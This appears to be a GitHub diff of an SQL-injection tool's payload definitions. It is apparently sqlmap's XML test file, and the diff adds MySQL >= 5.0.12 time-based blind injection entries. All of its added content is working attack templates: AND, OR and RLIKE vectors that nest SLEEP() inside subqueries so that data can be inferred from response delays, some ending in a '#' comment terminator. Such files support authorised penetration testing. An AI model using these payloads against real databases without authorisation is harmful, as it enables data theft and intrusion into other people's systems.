|
84 | 84 | </details> |
85 | 85 | </test> |
86 | 86 |
|
| 87 | + <test> |
| 88 | + <title>MySQL >= 5.0.12 AND time-based blind (query SLEEP)</title> |
| 89 | + <stype>5</stype> |
| 90 | + <level>2</level> |
| 91 | + <risk>1</risk> |
| 92 | + <clause>1,2,3,9</clause> |
| 93 | + <where>1</where> |
| 94 | + <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
| 95 | + <request> |
| 96 | + <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
| 97 | + </request> |
| 98 | + <response> |
| 99 | + <time>[SLEEPTIME]</time> |
| 100 | + </response> |
| 101 | + <details> |
| 102 | + <dbms>MySQL</dbms> |
| 103 | + <dbms_version>>= 5.0.12</dbms_version> |
| 104 | + </details> |
| 105 | + </test> |
| 106 | + |
| 107 | + <test> |
| 108 | + <title>MySQL >= 5.0.12 OR time-based blind (query SLEEP)</title> |
| 109 | + <stype>5</stype> |
| 110 | + <level>2</level> |
| 111 | + <risk>3</risk> |
| 112 | + <clause>1,2,3,9</clause> |
| 113 | + <where>1</where> |
| 114 | + <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
| 115 | + <request> |
| 116 | + <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
| 117 | + </request> |
| 118 | + <response> |
| 119 | + <time>[SLEEPTIME]</time> |
| 120 | + </response> |
| 121 | + <details> |
| 122 | + <dbms>MySQL</dbms> |
| 123 | + <dbms_version>>= 5.0.12</dbms_version> |
| 124 | + </details> |
| 125 | + </test> |
| 126 | + |
| 127 | + <test> |
| 128 | + <title>MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)</title> |
| 129 | + <stype>5</stype> |
| 130 | + <level>3</level> |
| 131 | + <risk>1</risk> |
| 132 | + <clause>1,2,3,9</clause> |
| 133 | + <where>1</where> |
| 134 | + <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
| 135 | + <request> |
| 136 | + <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
| 137 | + <comment>#</comment> |
| 138 | + </request> |
| 139 | + <response> |
| 140 | + <time>[SLEEPTIME]</time> |
| 141 | + </response> |
| 142 | + <details> |
| 143 | + <dbms>MySQL</dbms> |
| 144 | + <dbms_version>>= 5.0.12</dbms_version> |
| 145 | + </details> |
| 146 | + </test> |
| 147 | + |
| 148 | + <test> |
| 149 | + <title>MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)</title> |
| 150 | + <stype>5</stype> |
| 151 | + <level>3</level> |
| 152 | + <risk>3</risk> |
| 153 | + <clause>1,2,3,9</clause> |
| 154 | + <where>1</where> |
| 155 | + <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
| 156 | + <request> |
| 157 | + <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
| 158 | + <comment>#</comment> |
| 159 | + </request> |
| 160 | + <response> |
| 161 | + <time>[SLEEPTIME]</time> |
| 162 | + </response> |
| 163 | + <details> |
| 164 | + <dbms>MySQL</dbms> |
| 165 | + <dbms_version>>= 5.0.12</dbms_version> |
| 166 | + </details> |
| 167 | + </test> |
| 168 | + |
87 | 169 | <test> |
88 | 170 | <title>MySQL <= 5.0.11 AND time-based blind (heavy query)</title> |
89 | 171 | <stype>5</stype> |
|
207 | 289 | </details> |
208 | 290 | </test> |
209 | 291 |
|
| 292 | + <test> |
| 293 | + <title>MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)</title> |
| 294 | + <stype>5</stype> |
| 295 | + <level>3</level> |
| 296 | + <risk>1</risk> |
| 297 | + <clause>1,2,3,9</clause> |
| 298 | + <where>1</where> |
| 299 | + <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
| 300 | + <request> |
| 301 | + <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
| 302 | + </request> |
| 303 | + <response> |
| 304 | + <time>[SLEEPTIME]</time> |
| 305 | + </response> |
| 306 | + <details> |
| 307 | + <dbms>MySQL</dbms> |
| 308 | + <dbms_version>>= 5.0.12</dbms_version> |
| 309 | + </details> |
| 310 | + </test> |
| 311 | + |
| 312 | + <test> |
| 313 | + <title>MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)</title> |
| 314 | + <stype>5</stype> |
| 315 | + <level>4</level> |
| 316 | + <risk>1</risk> |
| 317 | + <clause>1,2,3,9</clause> |
| 318 | + <where>1</where> |
| 319 | + <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
| 320 | + <request> |
| 321 | + <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
| 322 | + <comment>#</comment> |
| 323 | + </request> |
| 324 | + <response> |
| 325 | + <time>[SLEEPTIME]</time> |
| 326 | + </response> |
| 327 | + <details> |
| 328 | + <dbms>MySQL</dbms> |
| 329 | + <dbms_version>>= 5.0.12</dbms_version> |
| 330 | + </details> |
| 331 | + </test> |
| 332 | + |
210 | 333 | <test> |
211 | 334 | <title>MySQL AND time-based blind (ELT)</title> |
212 | 335 | <stype>5</stype> |
|
0 commit comments